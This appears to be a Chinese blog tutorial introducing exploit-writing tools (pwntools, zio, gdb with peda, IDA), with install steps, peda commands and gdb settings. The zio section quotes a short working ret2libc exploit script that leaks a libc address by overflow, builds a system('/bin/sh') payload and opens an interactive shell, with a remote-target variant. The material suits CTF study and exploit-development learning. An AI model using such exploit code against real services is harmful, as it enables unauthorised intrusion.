编写poc和exploit的几款常用工具介绍

1.pwntools

pwntools是一个CTF框架和漏洞利用开发库,用Python开发,由rapid设计,旨在让使用者简单快速的编写exploit。

pwntools对Ubuntu 12.04和14.04的支持最好,但是绝大多数的功能也支持Debian, Arch, FreeBSD, OSX, 等等。

sudo pip install pwntools即可安装

如果安装过程中提示缺少相应的库,应该都可以很容易的google到解决方法。

安装完成后执行以下命令来检测是否成功:

import pwn
>>> pwn.asm("xor eax,eax")
'1\xc0'
如果执行结果和上面相同,则说明安装成功,pwn模块现在可以使用了。

2.zio

pwntools和zio两者均是用python开发的exp编写工具,同时方便了远程exp和本地exp的转换  sudo pip install zio即可安装

zio is an easy-to-use io library for pwning development, supporting an unified interface for local process pwning and TCP socket io.

The primary goal of zio is to provide unified io interface between process stdin/stdout and TCP socket io. So when you have done local pwning development, you only need to change the io target to pwn the remote server.

The following code illustrate the basic idea.

from zio import *

if you_are_debugging_local_server_binary:
    io = zio('./buggy-server')            # used for local pwning development
elif you_are_pwning_remote_server:
    io = zio(('1.2.3.4', 1337))           # used to exploit remote service

io.write(your_awesome_ropchain_or_shellcode)
# hey, we got an interactive shell!
io.interact()
from zio import *
io = zio('./buggy-server')
# io = zio((pwn.server, 1337))

for i in xrange(1337):
    io.writeline('add ' + str(i))
    io.read_until('>>')

io.write("add TFpdp1gL4Qu4aVCHUF6AY5Gs7WKCoTYzPv49QSa\ninfo " + "A" * 49 + "\nshow\n")
io.read_until('A' * 49)
libc_base = l32(io.read(4)) - 0x1a9960
libc_system = libc_base + 0x3ea70
libc_binsh = libc_base + 0x15fcbf
payload = 'A' * 64 + l32(libc_system) + 'JJJJ' + l32(libc_binsh)
io.write('info ' + payload + "\nshow\nexit\n")
io.read_until(">>")
# We've got a shell;-)
io.interact()

3.gdb+peda

关于gdb的介绍我不想多说,http://blog.csdn.net/haoel/article/details/2879大家可以看看这一系列文章,或者直接看我的blog的相关部分(我的没有给出的这篇详细)。

而peda是用python开发gdb插件用来:

  • Enhance the display of gdb: colorize and display disassembly codes, registers, memory information during debuggin
  • 相关命令的解释:
  • Add commands to support debugging and exploit development (for a full list of commands use peda help):
    • aslr -- Show/set ASLR setting of GDB
    • checksec -- Check for various security options of binary
    • dumpargs -- Display arguments passed to a function when stopped at a call instruction
    • dumprop -- Dump all ROP gadgets in specific memory range
    • elfheader -- Get headers information from debugged ELF file
    • elfsymbol -- Get non-debugging symbol information from an ELF file
    • lookup -- Search for all addresses/references to addresses which belong to a memory range
    • patch -- Patch memory start at an address with string/hexstring/int
    • pattern -- Generate, search, or write a cyclic pattern to memory
    • procinfo -- Display various info from /proc/pid/
    • pshow -- Show various PEDA options and other settings
    • pset -- Set various PEDA options and other settings
    • readelf -- Get headers information from an ELF file
    • ropgadget -- Get common ROP gadgets of binary or library
    • ropsearch -- Search for ROP gadgets in memory
    • searchmem|find -- Search for a pattern in memory; support regex search
    • shellcode -- Generate or download common shellcodes.
    • skeleton -- Generate python exploit code template
    • vmmap -- Get virtual mapping address ranges of section(s) in debugged process
    • xormem -- XOR a memory region with a key

安装:

git clone https://github.com/longld/peda.git ~/peda
echo "source ~/peda/peda.py" >> ~/.gdbinit

如果没什么问题的话,现在执行gdb就会发现之前gdb$会变成gdb-peda$,由于我在windows下写blog,在另一台lubuntu14.04上安装的,所以不方便截图,大家见谅。

github上关于peda的README.md中倒是有几张截图,大家有兴趣的话可以看看:https://github.com/longld/peda

当然,peda的一些属性是可以配置的:

.gdbinit
# Source all settings from the peda dir
source ~/peda/peda.py
# These are other settings I have found useful
# Intel syntax is more readable
set disassembly-flavor intel
# When inspecting large portions of code the scrollbar works better than 'less'
set pagination off
# Keep a history of all the commands typed. Search is possible using ctrl-r
set history save on
set history filename ~/.gdb_history
set history size 32768
set history expansion on
Making the following modification to ~/peda/lib/config.py is also recommended:
-    "debug"     : ("off", "show detail error of peda commands, e.g: on|off"),
+    "debug"     : ("on", "show detail error of peda commands, e.g: on|off"),
  • General usage and features
  • The list of commands can be read by typing  peda
  • Peda has wrappers over many gdb commands
  • Here is  disas versus  pdisas:
  • There are three commands to show context:
    • context reg for the registers and flags
    • context code for disassembling around the current instruction pointer
    • context stack for examining the stack
  • There is also a command for all at once:  context all that is run by default whenever a breakpoint is hit:
  • As you can see, there is a lot of information available. Note that the addresses are color coded according to their origin: code/data/rodata
  • Peda also features smart dereferencing (telescoping)
  • Getting information about an address or register can be done with  xinfo. The origin of the mapping is searched from another command:  vmmaps


  • Displaying all strings in the address space is done using  strings
  • Searching for specific strings can be done with  find
  • Sometimes you need to find a pointer to a specific string. You can use  refsearch
  • Searching for specific instructions or chains of instructions is done using  asmsearch(although it's not always accurate)

Exploit/ Reverse Engineering specifics

  • Process info and security
  • ROP gadgets
  • Tracing calls
  • Tracing individual instructions: Peda can also infer the arguments to functions or the operands for comparisons and display them
  • Creating exploit patterns and searching for them in memory and registers

更多信息见:http://security.cs.pub.ro/hexcellents/wiki/kb/toolset/peda

4.IDA

由于IDA的功能过于强大,不适合在本文中简单讲解,建议大家去学习一下《IDA pro权威指南》这本书,再加上勤奋的动手,我想你会爱上IDA的,因为她确实很迷人。


你可能感兴趣的:(Android安全)